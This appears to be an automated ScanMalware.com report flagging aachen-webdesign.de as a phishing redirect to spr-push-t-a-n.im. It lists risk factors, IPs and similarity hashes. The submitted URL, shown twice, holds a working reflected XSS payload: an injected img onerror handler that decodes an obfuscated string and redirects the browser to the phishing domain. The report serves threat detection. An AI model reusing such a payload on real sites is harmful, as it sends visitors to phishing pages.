ScanMalware.com

Security Scan Report: aachen-webdesign.de

Redirected to: https://spr-push-t-a-n.im/online/

Submitted: Oct 11, 2025, 12:41:18 PMCompleted: Oct 11, 2025, 12:42:05 PMpubliccompleted
Loading additional data...

Summary

This website contacted 12 IPs in 2 countries across 4 domains to perform 63 HTTP transactions. The main domain is spr-push-t-a-n.im.

Submitted URL: https://aachen-webdesign.de/verzet/indiv.php?lang=en&ID=879%22%2F%3E%3Cimg+src%3D%22https%3A%2F%2Fgoogle.com%2FvQhDoiwkyrFLTRH4.jpg%22+onerror%3D%22window.location%3DdecodeURIComponent%28atob%28%27Njg3NDc0NzA3MzNhMmYyZjczNzA3MjJkNzA3NTczNjgyZDc0MmQ2MTJkNmUyZTY5NmQyZjZmNmU2YzY5NmU2NTJm%27%29.replace%28%2F%28..%29%2Fg%2C+%27%25%241%27%29%29%3B%22%3E

Effective URL: https://spr-push-t-a-n.im/online/Redirected

AI Security Verdict

High Risk

Confidence: 95%

8
Risk Score

Site is flagged as a phishing page; do not trust or provide any information.

Risk Factors
Social engineering phishing detection by Google Safe Browsing
Unranked, likely newly registered domain
Cloudflare block page indicating suspected phishing activity
Redirect to a suspicious, unranked domain (spr-push-t-a-n.im)
Domain age information unavailable

Details

Bot Protection Detected

This website is protected by Cloudflare bot protection. Our scanner was challenged or blocked during access.

Page Title

Suspected phishing site | Cloudflare

Scan Type

public

Language

🇺🇸

English

(50% confidence)

Category

phishing scam

(85%)

Domain Information

Domain 'aachen-webdesign.de' uses the German country-code top-level domain (.de) with no subdomain. Its registrable label 'aachen-webdesign' stretches across 16 characters holding six vowels versus 9 consonants, plus one hyphen. It segments into three words: aachen, web, design. Median word length comes out to 6 characters. The linguistic tilt is German for 'apachen'. Secondary signals appear in Dutch and Norwegian.

Screenshot

Security scan screenshot of https://aachen-webdesign.de/verzet/indiv.php?lang=en&ID=879%22%2F%3E%3Cimg+src%3D%22https%3A%2F%2Fgoogle.com%2FvQhDoiwkyrFLTRH4.jpg%22+onerror%3D%22window.location%3DdecodeURIComponent%28atob%28%27Njg3NDc0NzA3MzNhMmYyZjczNzA3MjJkNzA3NTczNjgyZDc0MmQ2MTJkNmUyZTY5NmQyZjZmNmU2YzY5NmU2NTJm%27%29.replace%28%2F%28..%29%2Fg%2C+%27%25%241%27%29%29%3B%22%3E

Page Load Overview

29.69s
Total Load Time
63
HTTP Requests
4
Domains
54 KB
Total Size

Language Analysis

Primary Language

🇺🇸English
Code: en
Confidence:50%
Script:Latin
Direction:ltr

Detection Details

Language Code:en
Detection Confidence:50%
Script Type:Latin
HTML Lang Attribute:en-US
Text Length:395 chars
Detector Agreement:100%

Website Classification

Primary Category

phishing scam85% confidence
Type: dynamic
Method: ml+structural

All Detected Categories

phishing scam
85%
technology software
27%

Detected Features

No structural features detected

Domain & IP Information

RequestsIP AddressLocationAS Autonomous System
8188.114.97.3United States
AS13335CLOUDFLARENET
5104.18.95.41United States
AS13335CLOUDFLARENET
5216.58.206.46United States
AS15169GOOGLE
546.38.249.142Nuremberg, Bavaria, Germany
AS197540netcup GmbH
5188.114.96.3United States
AS13335CLOUDFLARENET
5104.18.94.41United States
AS13335CLOUDFLARENET
52a03:4000:30:313::10:836Nuremberg, Bavaria, Germany
AS197540netcup GmbH
52a00:1450:4001:830::200eFrankfurt am Main, Hesse, Germany
AS15169GOOGLE
52a06:98c1:3121::3United States
AS13335CLOUDFLARENET
52606:4700::6812:5f29United States
AS13335CLOUDFLARENET
6312--

Content Similarity HashesFor malware variant detection

TLSH (Trend Micro Locality Sensitive Hash)

Security-focused

Specialized for malware detection and similarity analysis

T1B4A18372FAFD043F119391B2A6B9B70939A5C007C7A6099076BCC2B51F4BF51AD132C5

ssdeep (Context Triggered Piecewise Hashing)

Context-aware

Detects similar content even with modifications

96:liADa/D+DMFozLeiO/t8AUTgZieMuNnRC3vaQxvb0:liEa/SoYnOVYgZEuNnM3Cej0

sdhash (Similarity Digest Hashing)

High-precision

High-precision similarity detection for forensic analysis

sdhash:3:4784:IBEAQIASAEARAhUENAAkAIsAAAhEIAAVAEaZAkAyAEygKBggBABQQQAIAxEQAVBDaFgCg0ggDEACAIAAIQIEIQAqASgBCABQ

These hashes enable detection of similar websites and malware variants by comparing content similarity even when exact matches aren't found.

Image Hashes

Perceptual Hashes

Average Hash:ff8787ffc7ffffff
Perceptual Hash:b83898c3c3c7ce3c
Difference Hash:203c3c001c000000
Wavelet Hash:9c8480c0033f3f3f
Color Hash:#1f5793

Other Hashes

Crop Resistant:203c3c001c000000

Scan History

Scan history not available

Unable to load historical scan data